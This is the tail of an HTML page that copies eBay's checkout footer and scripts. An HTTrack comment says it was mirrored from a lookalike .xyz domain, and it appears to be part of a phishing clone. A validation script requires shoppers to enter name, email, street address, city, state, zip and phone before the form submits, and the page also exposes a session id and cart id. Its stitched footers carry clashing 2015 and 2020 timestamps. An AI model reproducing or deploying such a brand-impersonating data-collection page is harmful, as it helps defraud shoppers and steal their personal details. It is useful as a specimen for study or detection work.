              <div style="clear:both">
                <div id="ajaxtimer" style="display:none"> Ajax Timer: <span
                    id="ajaxtime"></span> </div>
                <div id="submittimer" style="display:none"> Submit
                  Timer: <span id="submittime"></span> </div>
                <div id="pmdiv" style="display:none">
                  <div> Turbo 11 Second Timer: <span id="initloadtime"></span>
                  </div>
                  <div> Turbo 25 Second Timer: <span id="loadtime"></span>
                  </div>
                </div>
              </div>
            </div>
          </div>
          <div class="comments"
            url="http://qu.ebay.com/survey?srvName=Checkout(Checkout_Redesign_US)&amp;extParam=uid:sandisarka33|cartid:13337738378|attr:SkipCYP;ServiceSession;SchedulerFeatureEnabled;scta|pagename:RYP|sessionid:395867503010"
            aria-haspopup="true"></div>
          <input name="cartversion" id="cartversion"
            value="1446301761895" type="hidden"> <input
            name="sessionid" id="sessionid" value="395867503010"
            type="hidden">
          <!-- RcmdId RYP_RENDER,RlogId t6%7Bjqbadvw9%3Feog4d72f%2B0fa4-150be4e6efd-0xa6 -->
        </form>
      </div>
      <!-- cartid:13337738378 Flow: SBC_Raptor Page: RYP -->
      <!--[if lt IE 9]><div id="glbfooter" role="contentinfo" class="gh-w gh-flex"><![endif]--><!--[if (gte IE 9)|!(IE)]><!--><footer id="glbfooter" role="contentinfo" class="gh-w gh-flex"><!--<![endif]--><div><div id=rtm_html_1650></div><div id=rtm_html_1651></div></div><h2 class=gh-ar-hdn>Additional site navigation</h2><div id="gf-t-box"><table class="gf-t" role="presentation"><tr><td colspan=2><ul id="gf-l" class="gh-hide-if-nocss"><li class="gf-li"><a href="https://www.ebayinc.com" 
		 _exsp=m571.l2602 class="thrd gf-bar-a"

	>
		About eBay</a></li><li class="gf-li"><a href="http://announcements.ebay.com" 
		 _exsp=m571.l2935 class="thrd gf-bar-a"

	>
		Announcements</a></li><li class="gf-li"><a href="http://community.ebay.com" 
		 _exsp=m571.l1540 class="thrd gf-bar-a"

	>
		Community</a></li><li class="gf-li"><a href="https://pages.ebay.com/securitycenter/index.html" 
		 _exsp=m571.l2616 class="thrd gf-bar-a"

	>
		Security Center</a></li><li class="gf-li"><a href="https://resolutioncenter.ebay.com/" 
		 _sp=m571.l1619 data-sp=m571.l1619 class="thrd gf-bar-a"

	>
		Resolution Center</a></li><li class="gf-li"><a href="http://pages.ebay.com/sellerinformation/index.html" 
		 _exsp=m571.l1613 class="thrd gf-bar-a"

	>
		Seller Information Center</a></li><li class="gf-li"><a href="https://pages.ebay.com/help/policies/overview.html" 
		 _exsp=m571.l2604 class="thrd gf-bar-a"

	>
		Policies</a></li><li class="gf-li"><a href="https://www.ebaypartnernetwork.com/files/hub/en-US/index.html" 
		 _exsp=m571.l3947 class="thrd gf-bar-a"

	>
		Affiliates</a></li><li class="gf-li"><a href="https://ocsnext.ebay.com/ocs/home" 
		 _sp=m571.l1545 data-sp=m571.l1545 class="thrd gf-bar-a"

	>
		Help & Contact</a></li><li class="gf-li"><a href="https://pages.ebay.com/sitemap.html" 
		 _exsp=m571.l2909 class="thrd gf-bar-a"

	>
		Site Map</a></li></ul></td></tr><tr valign="top"><td class="gf-legal">Copyright © 1995-2020 eBay Inc. All Rights Reserved. <a href="https://www.ebayinc.com/accessibility/">Accessibility</a>, <a href="https://pages.ebay.com/help/policies/user-agreement.html">User Agreement</a>, <a href="https://pages.ebay.com/help/policies/privacy-policy.html">Privacy</a>, <a href="https://pages.ebay.com/help/account/cookies-web-beacons.html">Cookies</a> and <a href="https://www.ebay.com/adchoice"id=gf-AdChoice>AdChoice</a></td><td nowrap align=center><a title="Verify site's SSL certificate" _exsp="m571.l3943" href="https://trustsealinfo.websecurity.norton.com/splash?form_file=fdf/splash.fdf&amp;dn=www.ebay.com&amp;lang=en" onclick="this.href='https://trustsealinfo.websecurity.norton.com/splash?form_file=fdf/splash.fdf&amp;dn=#D#&amp;lang=en'.replace(/#D#/,location.host);return true" rel="noreferrer"><i id=gf-norton>Norton Secured - powered by Verisign</i></a></td></tr></table></div><!--[if lt IE 9]></div><![endif]--><!--[if (gte IE 9)|!(IE)]><!--></footer><!--<![endif]--><!--ts:2020.01.27.16:00--><!--rq:--><!--rvr:114rcb-->
<div id="JSDF"><script src="https://ir.ebaystatic.com/rs/v/ug5swannj2zhramycvq3mi4mwih.js" type="text/javascript"></script><script src="https://ir.ebaystatic.com/rs/v/1njzwnf4fu5gbjntdkwllm1jm2e.js" type="text/javascript"></script><script src="https://ir.ebaystatic.com/rs/v/1tywqebihu4tdoaih2prfiimoab.js" type="text/javascript"></script><script src="https://ir.ebaystatic.com/rs/c/makeebayfasterscript-src-scripts-body-78a2168a.js" type="text/javascript"></script><script src="https://ir.ebaystatic.com/rs/v/x4m2kt2tqa4wtn2qmgbajkosgiy.js" type="text/javascript"></script><script type="text/javascript" >
			var rtmUITrackerConfig = {"viewComplete":3,"viewInterval":500,"pageId":2047675,"deactivateAfter":600,"trackingEnabled":"true","samplingRate":100,"hoverMin":500};
		    var _plsubtInp = {"appId":"viewitem","eventFamily":"ADS","pageId":2047675,"disableImp":true,"env":"PROD"};
		    _plsubtInp.pageLoadTime = new Date().getTime();
		    _plsubtInp.samplingRate = rtmUITrackerConfig.samplingRate;
	        var _tq = [];
	    </script>
          <!--[if lt IE 9]></div><![endif]-->
          <!--[if (gte IE 9)|!(IE)]><!--> </footer>
        <!--<![endif]-->
        <!--ts:2015.10.30.13:51-->
        <!--rq:-->
        <!-- rvr:77rc5 --> </div>
    </div>
    <script src="ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
    <script src="ajax.aspnetcdn.com/ajax/jquery.validate/1.9/jquery.validate.min.js"></script>
    <script type="text/javascript">
			(function($,W,D)
				{
				    var JQUERY4U = {};

				    JQUERY4U.UTIL =
				    {
				        setupFormValidation: function()
				        {
				            //form validation rules
				            $("#pageform").validate({
				                rules: {
				                    country: "required",
				                    contactName: "required",
				                    contactEmail: {
				                        required: true,
				                        email: true
				                    },
				                    address1: "required",
				                    city: "required",
				                    state: "required",
				                    zip: "required",
				                    phone: {
				                        required: true,
      									phoneUS: false
				                    }
				                },
				                messages: {
				                    country: "Please enter your country",
				                    contactName: "Please enter your name",
				                    contactEmail: "Please enter a valid email address",
				                    address1: "Please enter your street address",
				                    city: "Please enter your city",
				                    state: "Please enter your state",
				                    zip: "Please enter your zip code",
				                    phone: "Please enter a valid phone number"
				                },
				                submitHandler: function(form) {
				                    form.submit();
				                }
				            });
				        }
				    }

				    //when the dom has loaded setup form validation rules
				    $(D).ready(function($) {
				        JQUERY4U.UTIL.setupFormValidation();
				    });

				})(jQuery, window, document);
			$(document).ready(function(){
				$('#spn_shiptobtn a, #shipitem a').on('click', function(e){
					e.preventDefault();
					$('#pageform').submit();
				});
			});
		</script>
  </body>

<!-- Mirrored from iphone-8-plus-256gb.554366123244hashitem1c849c44c9gocyaaoswntzd0envxpmtr.xyz/checkout.php?orFreeProduct/221278135775?_trksid=p2047675.c100005.m1851&_trkparms=aid%3D222007%26algo%3DSIC.MBE%26ao%3D2%26asc%3D35426%26meid%3Dcfe574b4452b4bc6a667548f5d854937%26pid%3D100005%26rk%3D3%26rkt%3D6%26sd%3D221278144716= by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 13 Oct 2017 18:49:46 GMT -->
</html>
